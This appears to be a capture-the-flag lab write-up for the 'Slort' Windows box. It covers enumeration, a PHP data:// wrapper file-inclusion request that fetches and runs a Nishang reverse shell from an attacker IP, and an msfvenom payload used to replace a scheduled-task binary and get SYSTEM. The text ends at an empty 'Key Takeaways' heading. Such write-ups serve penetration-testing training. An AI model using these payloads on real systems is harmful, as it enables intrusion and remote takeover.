PG: Slort

Enumeration#

Nmap#

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     FileZilla ftpd 0.9.41 beta
135/tcp  open  msrpc   Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql   MariaDB (host not allowed)
4443/tcp open  http    Apache httpd 2.4.43 (XAMPP)
8080/tcp open  http    Apache httpd 2.4.43 (XAMPP)

Windows box running XAMPP on two ports. FTP requires credentials, MySQL is localhost-only.

Port 8080 - XAMPP Web App#

Directory fuzzing and manual crawling reveals an interesting endpoint:

http://192.168.105.53:8080/site/index.php?page=main.php

The page parameter smells like file inclusion.

Foothold#

PHP Wrapper RCE#

The page parameter is vulnerable to LFI, RFI, and PHP wrappers. The data:// wrapper gives direct code execution:

http://192.168.105.53:8080/site/index.php?page=data:text/plain,<?php echo shell_exec("whoami") ?>

For a proper shell, use the wrapper to download and execute a Nishang reverse shell in memory. URL-encode the payload and send via Burp:

GET /site/index.php?page=data:text/plain,<?php+echo+shell_exec("powershell.exe+-nop+-exec+bypass+IEX+(IWR+http%3a//192.168.49.105/Invoke-PowerShellTcp.ps1+-UseBasicParsing)")+?> HTTP/1.1

Shell as rupert – unprivileged user with no interesting permissions.

Privilege Escalation#

Scheduled Task Binary Replacement#

Poking around the filesystem reveals C:\backup\ containing a binary (TFTP.EXE) and a text file explaining it runs every 5 minutes as a scheduled task.

Replace it with a reverse shell:

1

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.105 LPORT=4466 -f exe > pwn.exe

1
2

# Download and overwrite the scheduled binary
IWR http://192.168.49.105/pwn.exe -UseBasicParsing -o C:\backup\TFTP.EXE

Wait for the task to fire, catch a SYSTEM shell.

Proof#

whoami
nt authority\system

Key Takeaways#